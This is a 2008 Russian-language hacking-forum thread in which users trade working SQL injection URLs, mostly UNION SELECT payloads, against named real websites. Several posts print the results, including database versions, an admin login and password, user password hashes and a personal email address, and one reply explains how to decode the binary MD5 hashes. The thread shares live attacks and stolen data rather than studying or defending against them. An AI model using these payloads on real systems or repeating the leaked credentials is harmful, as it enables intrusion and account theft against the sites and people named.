16.02.2008, 05:17
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
ЭТО был сайт провославной молодежи теперь он в заднице и не скоро от туда выбереться
Такие высказывания оскорбительны.. Держи свои мысли при себе! 
к стате сайт норм работает 
===================================
Сообщение от 159932
xcedz пусть мне поставят минусы НО за*бал ! /
ответ: Заe-aл не выe-aл = потерпишь .
/извини за хамство/ на счет "идиотских" шрифтов и "тем более идиотского цвета" это вопрос не ко мне ... так настроен форум есле ты не в курсе 
===================================
по теме
http://www.ikointl.com/pro_career.php?menu_id=-2222'+union+select+1,2,concat_ws(0x2F,version(),da tabase(),user()),4/*
5.0.45-log/ikointl_main/ikointl@localhost
-2222'+union+select+1,2,concat(admin,char(58),passw ord),4+from+admin/* 
admin:123!$
Последний раз редактировалось xcedz; 16.02.2008 в 09:11..
|
|
|
16.02.2008, 14:39
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами:
10198073
Репутация:
354
|
|
ПР-7 вроде.
http://www2.umaine.edu/graduate/article.php?id=-63'+union+select+1,concat_ws(0x3A3a,username,passw ord),3,4+from+users+limit+0,1/*
Пассы расшифровываются, но к админке не подходят.
|
|
|
|
16.02.2008, 16:36
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
С нами:
10362626
Репутация:
327
|
|
_http://maps.mail.ru/msk/route.asp?tr1='/*&tr2='/*
|
|
|
|
16.02.2008, 16:44
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
Это не sql инъекция Ругается на любой символ. Кавычки тут вообще не причем, они фильтруются.
|
|
|
|
16.02.2008, 16:59
|
|
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами:
9752260
Репутация:
150
|
|
http://www.viking.tm/product.php?id=-91+union+select+1,table_name,3,4,5,6,7+from+inform ation_schema.tables--
Картинки надо вырубать
Последний раз редактировалось Sleep; 16.02.2008 в 17:16..
|
|
|
|
16.02.2008, 18:48
|
|
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами:
9752260
Репутация:
150
|
|
PHP код:
http://nodel.org/events.php?ID=-1%2527%2520+union+select+1,2,3,4,5,6,7,8,TABLE_NAME,1,2,3,4,5,6,7+from+information_schema.tables+limit+1,1--
PHP код:
http://www.ultraproducts.com/st_content.php?id=-1+union+select+1,2,CONCAT(user(),version(),database())--
|
|
|
|
16.02.2008, 19:03
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
впервые вижу
http://www.multifamilyassessment.net/index.php?p=g&id=-1+union+select+1,version()/*
вывод типа ****.php
Warning: main(4.0.24_Debi.php): |
|
|
|
16.02.2008, 19:13
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
Сообщение от xcedz
впервые вижу
http://www.multifamilyassessment.net/index.php?p=g&id=-1+union+select+1,version()/*
вывод типа ****.php
Warning: main(4.0.24_Debi.php): Гг php include через sql инъекцию  Я и покруче видел, у меня в эксплоите для jportal исполнение кода через mysql inj
|
|
|
|
16.02.2008, 22:38
|
|
Познающий
Регистрация: 06.11.2007
Сообщений: 57
С нами:
9742782
Репутация:
272
|
|
uabest.net
Код:
http://uabest.net/mobile/download.php?jgid=-47+union+select+1,2,3,4,5,6,7,8,9/*
version() 5.0.37-log
user() uabest_best@localhost
database() uabest_uabest
maxpaintball.ru
Код:
http://www.maxpaintball.ru/show_cat2.php?grid=-2+union+select+concat(version(),0x3a,user(),0x3a,database())
version() 4.0.27-max-log
user() maxpain3_shop@v22.valuehost.ru
database() maxpain3_shop
Код:
http://www.maxpaintball.ru/show_cat2.php?grid=-2+union+select+concat(username,0x3a,email,0x3a,passwd)+from+user+where+username+like+1013
1013:Boikov@rbr.ru:697423ce62550904
hwdecor.ru
Код:
http://hwdecor.ru/show_cat2.php?grid=-5+union+select+concat(version(),0x3a,user(),0x3a,database())/*
version() 4.0.27-max-log
user() effa112_shop@v48.valuehost.ru
database() effa112_shop
christcollege.edu
Код:
http://www.christcollege.edu/progdetails.php?prid=-51+union+select+1,2,3,4/*
version() 4.1.20
user() christco_christ@localhost
database() christco_christcollege
pseb.org.pk
Код:
http://www.pseb.org.pk/page.php?prid=-39+union+select+1,2,3,4
version() 5.0.45-community-log
user() pseborg_newpseb
database() pseborg_pseb@localhost
Код:
http://www.pseb.org.pk/page.php?prid=-39+union+select+1,2,table_name,4+from+information_schema.tables
вывод данных идёт в цикле, поэтому лимитом не нужно пользоваться)
wildplanet.com
Код:
http://www.wildplanet.com/press/wp_release_single.php?prid=-56+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8
version() 5.0.24
user() outsideuser@localhost
database() NewSite
Код:
http://www.wildplanet.com/press/wp_release_single.php?prid=-56+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6,7,8+from+WPUser+limit+0,1
Код:
1:mseltzer:B%BB0%27VG%89%F6sw%97%FF%88%19%0CI
2:digibrew:UP%E5%CDlOQ%BEUP%E5%CDlOQ%BE
3:wildplanet:%EF%EF%A7%D45%5B%3B%DEb%1F2%AFM%9C%B0%BC
4:mthomas:ty%19zv%E5Z-WR%1F%CC%D6%03%F9%98
5:tboeger:.%FE%99%B5%08%15%B1y%E1%BF%9F%06%05%9Ba%C3
9:martin:%2A%FA%AB%2FWen%1F%24%F6%D2%C1%28%3ASh
так я и не понял, чем зашифрованы пассы=/
http://wildplanet.com/admin - админка
gamingtrend.com
Код:
http://www.gamingtrend.com/PressReleases/index.php?PRID=-99999+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7
version() 5.0.45-community
user() knight_tigg3rpig@localhost
database() knight_consolegold
Код:
http://www.gamingtrend.com/PressReleases/index.php?PRID=-99999+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+Users
Код:
DarkEl:32i692acrncR.
AgtFox:DELETED
Knightshade:32CcfdIVkoDRw
PJ_phildo:DELETED
|
|
|
|
16.02.2008, 23:31
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
так я и не понял, чем зашифрованы пассы=/
Скорее всего, это пресловутый md5 в виде бинарной строки...
Сначала надо сделать urldecode(), а затем,
чтобы привести в привычный вид, надо сделать bin2hex()
Последний раз редактировалось Macro; 17.02.2008 в 00:38..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
